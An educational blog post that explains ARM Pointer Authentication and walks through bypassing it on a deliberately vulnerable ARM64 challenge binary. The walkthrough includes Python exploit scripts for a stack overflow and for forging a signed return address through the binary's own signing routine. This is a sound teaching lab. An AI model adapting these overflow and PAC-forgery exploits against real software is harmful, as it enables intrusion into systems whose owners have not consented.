The latest efforts to harden software against exploitable memory corruption vulnerabilities come in the form of hardware-assisted control flow integrity and pointer authentication. Most notably, these ISA extensions are commonly referred to as Pointer Authentication (PAC) on ARM and Control-flow Enforcement Technology (CET) on Intel.
With a growing number of consumer devices embracing this generation of security mitigations, security enthusiasts naturally want to learn how to bypass these hardening technologies. In this post, we will cover the basics of exploiting a simple ‘Hello World!’ buffer overflow against an interactive PAC-protected ARM64 binary hosted on our browser-based educational platform.
Pointer Authentication Fundamentals
The ARMv8.3-A specification introduced Pointer Authentication in 2016. Colloquially referred to as PAC, these instructions were designed to make it significantly more difficult for malicious actors to use corrupted pointers in software exploitation. As a CPU-level mitigation, it enables security guarantees that were simply impossible in the past.
At its core, pointer authentication allows for the creation of ‘protected pointers’ that can be authenticated prior to each use. This is accomplished via a suite of keyed instructions that operate on a pointer and an optional context value. For the most part, these instructions simply add or remove a short “hash” that is stored in the high bits of a given pointer.
This “hash” is called a Pointer Authentication Code, hence the name PAC. Instructions which apply a PAC begin with the pac prefix (paciasp, etc…) and conversely, instructions that authenticate pointers begin with the aut prefix (autiasp, etc…). Finally, there exist a handful of PAC instructions that combine authentication with an action, e.g. autiasp followed by ret is equivalent to retaa, an authenticated return.
Attempting to directly use a PAC-protected pointer will result in a fault. Similarly, attempting to pass a pointer that is not PAC-protected to an aut instruction will result in a mangled pointer being returned. In theory, this ensures that if a pointer makes it through a pac/aut “cycle”, it has not been corrupted or tampered with.
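The pac/aut mechanics described above can be sketched with a toy Python model. This is only an illustration under loud assumptions: real hardware uses a dedicated cipher and secret keys rather than HMAC-SHA256, the 48-bit address width and the KEY value are made up, and marking failures with bit 63 simply mirrors the register dump shown later in this post.

```python
import hashlib
import hmac

VA_BITS = 48                        # assumed virtual-address width
ADDR_MASK = (1 << VA_BITS) - 1      # low bits hold the real address
ERROR_BIT = 1 << 63                 # toy "authentication failed" marker
KEY = b"toy-key-not-a-real-hardware-key"   # hypothetical key


def _mac(address: int, context: int) -> int:
    """Toy 16-bit keyed hash over (address, context)."""
    msg = address.to_bytes(8, "little") + context.to_bytes(8, "little")
    digest = hmac.new(KEY, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:2], "little")


def pac(pointer: int, context: int = 0) -> int:
    """Toy 'pac*': store the code in the unused high bits of the pointer."""
    address = pointer & ADDR_MASK
    return (_mac(address, context) << VA_BITS) | address


def aut(pointer: int, context: int = 0) -> int:
    """Toy 'aut*': strip the code if it verifies, otherwise mangle the pointer."""
    address = pointer & ADDR_MASK
    if pointer >> VA_BITS == _mac(address, context):
        return address
    return address | ERROR_BIT


signed = pac(0x400b04)
print(hex(aut(signed)))                     # round-trips to 0x400b04
print(hex(aut(signed ^ (1 << VA_BITS))))    # one flipped PAC bit: mangled result
# A raw, unsigned pointer only passes if the expected code happens to be 0,
# a 1-in-65536 chance with this toy 16-bit code.
print(hex(aut(0x400b04)))
```

Because the code is short, authentication is probabilistic rather than absolute: a guessed code has a small but non-zero chance of verifying.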
While this is only a cursory overview, we strongly recommend reading Google Project Zero’s blogpost or this paper if you are interested in a more comprehensive description of PAC, how its keying works, and existing limitations.
A PAC Protected Binary
To provide a working example of a PAC-protected binary, we have embedded a simple ARM64 challenge into this blogpost. This interactive environment will allow you to poke and prod at a PAC-enlightened system and executable from a web browser while following along with this post:
By running the challenge through the debugger tab in the environment provided above, we can see the program print out a simple menu containing three possible actions:
Flipping over to the source, we can see that the
read_contract() functions do exactly what their names suggest. The first function allows us to write arbitrary text into the “contract”, while the second prints out the contents of the contract. The remaining action
finalize_contract() is used to “sign” the contract.
In true nostalgic fashion, this challenge reads user input using the notoriously unsafe gets() function. Due to the unbounded nature of gets(), it is just about guaranteed to introduce memory corruption.
Classical Exploitation Methods
As discovered in the previous section, we have a fairly classic stack-based buffer overflow on our hands. Let’s try to exploit this as we would if PAC was not a factor. We only need two pieces of information for this:
- The address of our target function: winner()
- The number of bytes we need to supply to gets() until we smash a saved Link Register (i.e. return-address)
The first step is fairly straightforward: we can navigate to the function in our disassembler and copy the address, or use our debugger to query the address directly:
wdb> p/x winner
For the second step, let’s take a quick look at the disassembly of
contract_menu() as this is the function scope where the contract structure is declared:
First, note that x29 and x30 are being saved onto the stack via the stp (store pair) instruction:
stp x29, x30, [sp, #-0xd0]!
These are, respectively, the Frame Pointer (FP) and Link Register (LR). Additionally, because of the pre-indexed addressing mode (the trailing !), this instruction subtracts 0xd0 from the Stack Pointer (SP) before storing x29 and x30. It does not merely use 0xd0 as an offset; it actually modifies the register prior to storing FP and LR. This might not be obvious to those familiar with x86 systems.
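The difference between the pre-indexed form and a plain offset can be modeled in a few lines of Python. This is a rough sketch, not an emulator: the memory dictionary, the helper names, and the starting SP value are all hypothetical.

```python
def stp_pre_index(sp, memory, fp, lr, imm):
    """Model `stp x29, x30, [sp, #imm]!`: update SP first, then store the pair."""
    sp = sp + imm              # writeback happens before the store
    memory[sp] = fp            # x29 (FP) lands at the new SP
    memory[sp + 8] = lr        # x30 (LR) lands right above it
    return sp


def stp_offset(sp, memory, fp, lr, imm):
    """Model `stp x29, x30, [sp, #imm]` (no `!`): SP is left untouched."""
    memory[sp + imm] = fp
    memory[sp + imm + 8] = lr
    return sp


memory = {}
old_sp = 0x7ffff000            # hypothetical stack pointer on function entry
new_sp = stp_pre_index(old_sp, memory, fp=0x1111, lr=0x2222, imm=-0xd0)

print(hex(new_sp))             # 0x7fffef30
print(hex(memory[new_sp + 8])) # 0x2222
```

With the pre-indexed form, the saved FP/LR pair ends up at the very bottom of the new frame, at SP+0x0 and SP+0x8.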
Several instructions later, we see the contract structure being passed into memset():
add x0, sp, #0x18
mov x2, #0xb0
mov w1, #0
bl memset
From this, we know that the size of the contract structure is 0xb0 bytes, and that it begins 0x18 bytes above the current SP. An important thing to note here is that we cannot smash this function’s saved LR: it sits at SP+0x8, while the contract structure begins at a higher address (SP+0x18) and “grows” towards higher addresses, meaning that we will never hit it.
However, we can corrupt a saved LR at a higher address, in a caller’s stack frame. If we look at the disassembly of main(), we can see it also saves LR and FP in a similar manner to contract_menu():
paciasp
stp x29, x30, [sp, #-0x10]!
mov x29, sp
bl init_wargame
bl contract_menu
SP was decreased by 0xd0 at the start of contract_menu(), and we can start writing to the stack (via contract) at SP+0x18, so the distance to the saved LR/FP pair will be 0xd0 - 0x18 = 0xb8 bytes.
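The offsets involved can be worked out as a short calculation. The constants below are taken from the disassembly quoted above; the variable names are ours, and the sketch assumes main() does not move SP between its own stp and the call to contract_menu(), which matches the listing.

```python
CONTRACT_MENU_FRAME = 0xd0   # from: stp x29, x30, [sp, #-0xd0]!
CONTRACT_OFFSET = 0x18       # from: add x0, sp, #0x18
CONTRACT_SIZE = 0xb0         # from: mov x2, #0xb0 (memset length)

# All offsets are relative to SP inside contract_menu().
own_fp, own_lr = 0x0, 0x8                 # below the buffer, so unreachable
contract_end = CONTRACT_OFFSET + CONTRACT_SIZE
main_fp = CONTRACT_MENU_FRAME             # main()'s saved x29
main_lr = CONTRACT_MENU_FRAME + 8         # main()'s saved x30

padding_to_fp = main_fp - CONTRACT_OFFSET
padding_to_lr = main_lr - CONTRACT_OFFSET

print(hex(contract_end))     # 0xc8
print(hex(padding_to_fp))    # 0xb8
print(hex(padding_to_lr))    # 0xc0
```

In other words, 0xb8 bytes of filler reach main()'s saved FP, and the next 8 bytes after that overwrite its saved LR.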
By running the simple Python ‘exploit’ provided below, we will smash through the contract structure and overwrite the saved LR. Typing ‘4’ (the Quit command) to break from the menu loop will cause the program to return from main() and consume the overwritten return-address which now points at the winner() function:
import interact
import struct

# Pack integer 'n' into an 8-byte little-endian representation
def p64(n):
    return struct.pack('<Q', n)

# the address of the 'winner()' function
winner_address = p64(0x400b04)

# a simple buffer overflow to smash the saved return-address
payload = "A" * 0xb8
payload += "B" * 8 # FP
payload += winner_address # LR

# 'run' the challenge
p = interact.Process()

# select 'Work on Contract'
p.readuntil("4. Quit")
p.sendline("1")

# send 'text'
p.readuntil("contract:")
p.sendline(payload)

# send 'name'
p.readuntil("name:")
p.sendline("C"*8)

# release control to the user / terminal
p.interactive()
But thanks to the presence of PAC, our classic link-register overwrite is stopped dead in its tracks.
We successfully corrupted LR, but when main() tried to authenticate it, the corruption was detected, and a mangled version of the pointer was purposely emitted with an exception bit set. We can observe the result of this authentication failure by viewing the pc and lr registers directly after the segmentation fault:
...
      |-- 'PAC auth failed'
      v
pc: 0x8000000000400b04
lr: 0x0000000000400b04
...
This example illustrates the basic mechanics of PAC, and how hardware-assisted pointer authentication can be used to ensure control flow integrity. While encouraging, PAC is by no means perfect. In the next section, we’ll discuss some of its limitations.
The simplest method to bypass PAC is rooted in the ability to “counterfeit” PAC pointers. If an attacker can force the target application to mint new pointers of their choosing, these “malicious” pointers can be used in place of existing “good” ones. This technique is commonly referred to as PAC forgery.
Looking back at the provided challenge, the contract signature is generated by passing the name and date fields of the contract struct into the
sign_contract() function. While the source of this function has been omitted, we can navigate to its disassembly in the interactive environment to see the following:
This is simply a verbose function-level wrapper around the
pacia instruction, taking two arguments and returning the user’s “signature” for the contract. Since this “signature” was produced directly by
pacia, it can actually be consumed as a valid authenticated pointer.
While this is a contrived example constructed for educational purposes, it models what a god-like PAC-Forgery primitive will look like. Through careful control of the arguments passed to
sign_contract(), it is possible to create an authenticated pointer that can be used by our exploit to redirect control flow to the winner() function.
From our exploit attempt earlier in this post, we learned that our payload must overwrite the saved return-address with a valid authenticated pointer to the
winner() function. But even with the powerful pointer forgery primitive provided by this challenge, we need to know the correct
context value to sign our pointer with.
All of the functions in this binary start with the
paciasp instruction. This instruction implicitly operates on the LR register to produce an authenticated pointer, using the current SP register as the optional
context value. This is important to note, as it highlights how authenticated pointers can be tied to a specific execution context.
By specifying a
context value, PAC instructions are able to tie authenticated pointers to very specific locations or use cases within the binary. This can dramatically reduce an attacker’s ability to reuse an authenticated pointer in a codepath where it was not intended to be used.
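The effect of the context value can be illustrated with a small toy model in Python. It is only a sketch: the keyed hash is HMAC-SHA256 rather than the hardware cipher, and the key, the 48-bit address width, the helper names, and both SP values are hypothetical.

```python
import hashlib
import hmac

VA_BITS = 48                       # assumed address width
KEY = b"toy-instruction-key-A"     # hypothetical stand-in for the hardware key


def toy_pac(address: int, context: int) -> int:
    """Toy keyed hash of (address, context), truncated to 16 bits."""
    msg = address.to_bytes(8, "little") + context.to_bytes(8, "little")
    digest = hmac.new(KEY, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:2], "little")


def paciasp(lr: int, sp: int) -> int:
    """Toy `paciasp`: sign LR using SP as the context."""
    return (toy_pac(lr, sp) << VA_BITS) | lr


def autiasp_ok(signed_lr: int, sp: int) -> bool:
    """Toy `autiasp` check: does the stored code match for this SP?"""
    address = signed_lr & ((1 << VA_BITS) - 1)
    return signed_lr >> VA_BITS == toy_pac(address, sp)


winner = 0x400b04
sp_a = 0x7ffff000                  # hypothetical SP where the pointer is signed
sp_b = 0x7fffef30                  # hypothetical SP somewhere else

signed = paciasp(winner, sp_a)
print(autiasp_ok(signed, sp_a))    # True: signed and checked with the same SP
print(autiasp_ok(signed, sp_b))    # a different SP almost always fails the check
```

The same target address signed under two different stack pointers yields two unrelated codes, which is why a forged pointer is only useful if it was signed with the context the victim instruction will check against.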
With that in mind, we can deduce that we must sign our target pointer to the
winner() function with a
context value equal to what the stack pointer will be when the program normally returns from main().
Putting It All Together
To construct the final exploit, we will first fetch the SP
context value that the authenticated return-address for
main() is originally generated with. Since we have disabled ASLR for this exercise (!) the value will be a static stack address that will be identical across all runs.
Place a breakpoint in main() and dump the SP register:
wdb> b * 0x400d68
...
wdb> run
...
wdb> p $sp
With the context value and target pointer (winner()) known, we will modify our exploit script to forge an authenticated pointer using sign_contract().
We will abuse the same buffer overflow from our earlier exploit, but instead of simply smashing the saved LR, we will first craft a payload that corrupts the
date field of the contract with the
context value we dumped:
import interact
import struct

# Pack integer 'n' into an 8-byte little-endian representation
def p64(n):
    return struct.pack('<Q', n)

winner_address = p64(0x400b04)
stack_context = # TODO: follow the instructions!

# craft a payload to forge a pointer
forge_payload = winner_address
forge_payload += "\x00" * 24
forge_payload += stack_context

# 'run' the challenge
p = interact.Process()

# Choose to work on the contract, then send in our payload
print("Working on contract...")
p.readuntil("4. Quit")
p.sendline("1")

# send arbitrary contract 'text'
p.readuntil("contract:")
p.sendline("A"*8)

# overflow the 'name' field to set the contract 'date'
print("Overflowing name...")
p.readuntil("name:")
p.sendline(forge_payload)

# trigger the PAC forgery by 'finalizing' the contract
print("Forging pointer...")
p.readuntil("4. Quit")
p.sendline("3")
p.readuntil("continue")
p.send('\n')

# ...
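To see why this payload sets both values, it helps to view the same bytes through the struct layout the script implies. The sketch below assumes a 32-byte name field immediately followed by an 8-byte date, which is inferred from the 8 + 24 bytes of padding above rather than confirmed by the source; the stack_context value is a placeholder, not the real SP.

```python
import struct

NAME_SIZE = 32                     # assumed size of the 'name' field
winner_address = 0x400b04
stack_context = 0x7ffffff0         # placeholder only; use the SP you dumped

forge_payload = struct.pack("<Q", winner_address)   # first 8 bytes of 'name'
forge_payload += b"\x00" * 24                        # remainder of 'name'
forge_payload += struct.pack("<Q", stack_context)   # spills over into 'date'

# Reinterpret the bytes as: char name[32]; uint64_t date;
name, date = struct.unpack("<%dsQ" % NAME_SIZE, forge_payload)
pointer_arg = struct.unpack_from("<Q", name)[0]

print(hex(pointer_arg))            # 0x400b04
print(hex(date))                   # 0x7ffffff0
```

Keep in mind that gets() stops reading at a newline, so neither packed value may contain a 0x0a byte.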
Next, we can call the
print_contract() function to retrieve the “signature” on the contract. This is actually the forged pointer that we created.
# ...

# wait until we are at the menu, then print the contract
print("Reading forged pointer...")
p.readuntil("4. Quit")
p.sendline("2")

# save the text version of the signed pointer
p.readuntil("SIGNED: ")
pac = p.readuntil('\n')
print("Got authenticated pointer: %s" % pac)

# convert our forged pac into a "raw" form we can use in our exploit!
pac_as_bytes = p64(int(pac, 16))

# ...
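The conversion from the printed signature to raw bytes can be checked in isolation. In this sketch the leaked string is a made-up example, the helper name is ours, and the 48-bit split between address and PAC bits is an assumption.

```python
import struct

VA_BITS = 48   # assumed split between address bits and PAC bits


def parse_signed_pointer(line: str) -> bytes:
    """Turn the hex text that follows 'SIGNED: ' into 8 little-endian bytes."""
    value = int(line.strip(), 16)      # base 16 accepts an optional 0x prefix
    return struct.pack("<Q", value)


leaked = "0x2a000000400b04\n"          # made-up example value
raw = parse_signed_pointer(leaked)
value = struct.unpack("<Q", raw)[0]

print(raw.hex())                           # 040b400000002a00
print(hex(value & ((1 << VA_BITS) - 1)))   # 0x400b04
print(hex(value >> VA_BITS))               # 0x2a
```

The low bits still hold the address of winner(), while the high bits carry the code that the authentication step will check.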
At this point, we’re ready to put everything together and solve the challenge! All that’s left to do is send a payload to smash main’s authenticated return-address with our newly signed authenticated pointer.
# ...

# the return-address overwrite payload
payload = "A" * 0xb8
payload += "B" * 8 # FP
payload += pac_as_bytes # LR

# send up the final payload which contains the forged return-address
p.readuntil("4. Quit")
p.sendline("1")
p.readuntil("contract:")
p.sendline(payload)
p.readuntil("name:")
p.sendline("C"*8)

# quit the program / force the use of our corrupted LR
p.sendline("4")

# release control to the user / terminal
p.interactive()
If all went well, the contents of the flag file will be printed out to the terminal.
In this blogpost, we provided the ‘best-case’ scenario for hijacking control flow of a PAC protected executable. This serves as an introductory resource for learning the basics of the ARM Pointer Authentication implementation by examining a few of its instructions and walking through one technique to bypass the mitigation.
We saw that exploiting even an extremely powerful vulnerability took both additional effort and a perfect storm of primitives to complete successfully.